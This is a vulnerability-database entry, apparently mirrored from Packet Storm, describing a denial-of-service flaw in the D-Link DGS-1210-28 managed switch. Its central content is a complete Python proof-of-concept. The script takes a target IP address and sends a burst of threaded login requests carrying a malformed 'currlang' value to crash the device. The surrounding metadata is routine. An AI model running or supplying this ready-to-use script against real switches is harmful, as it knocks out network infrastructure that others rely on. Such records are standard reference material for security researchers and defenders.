ID
VAR-E-202009-0057
TITLE
D-Link DGS-1210-28 Denial Of Service
Trust: 0.5
DESCRIPTION
D-Link DGS-1210-28 suffers from a denial of service vulnerability.
Trust: 0.5
AFFECTED PRODUCTS
vendor: | d link | model: | dgs-1210-28 | scope: | - | version: | - | Trust: 0.5 |
EXPLOIT
#
# Exploit Title: D-Link DGS-1210-28 Denial of Service
# Date: 18 Sep 2020
# Exploit Author: Saeed Reza Zamanian
# Product : D-Link DGS-1210-28
# Vendor Homepage: https://www.dlink.com/
# Product Link: https://www.dlink.com/en/products/dgs-1210-28-28-port-gigabit-smart-managed-switch
# Version : DGS-1210-28
#
# Description : Device Login page is vulnerable against DoS attack. "currlang" parameter can accept
# int values , # if an attacker sends several requests with string value in currlang parameter it
# can affect device availability.
#
# Caution: Use this PoC at your own risk.
import requests
import json
import sys
import os
from concurrent.futures import ThreadPoolExecutor, as_completed
from time import time
intro = "==============================\n D-Link DGS-1210-28 DoS Tool \n==============================\nUsage : python3 "+os.path.basename(__file__)+ " IPAddress"
if len(sys.argv) < 2:
print(intro+"\n--------------\nFew Parameters\n")
exit()
def sendRequest(ip):
url = 'https://'+ip+'/homepage.htm'
postData = "Password=anyanyany&currlang=40anyanyany&Login=admin&BrowsingPage=index_dlink.htm&changlang=0"
r = requests.post(url, data = postData, headers = "")
def process(ip):
processes = []
with ThreadPoolExecutor(max_workers=10) as executor:
for x in range(100):
processes.append(executor.submit(sendRequest,str(ip)))
for task in as_completed(processes):
if task.result(): print(task.result())
process(sys.argv[1])
#EOF
Trust: 0.5
EXPLOIT HASH
LOCAL | SOURCE | ||||||||
|
|
Trust: 0.5
PRICE
free
Trust: 0.5
TAGS
tag: | exploit | Trust: 0.5 |
tag: | denial of service | Trust: 0.5 |
CREDITS
Saeed reza Zamanian
Trust: 0.5
EXTERNAL IDS
db: | PACKETSTORM | id: | 159225 | Trust: 0.5 |
SOURCES
db: | PACKETSTORM | id: | 159225 |
LAST UPDATE DATE
2022-07-27T09:37:17.580000+00:00
SOURCES RELEASE DATE
db: | PACKETSTORM | id: | 159225 | date: | 2020-09-18T02:22:22 |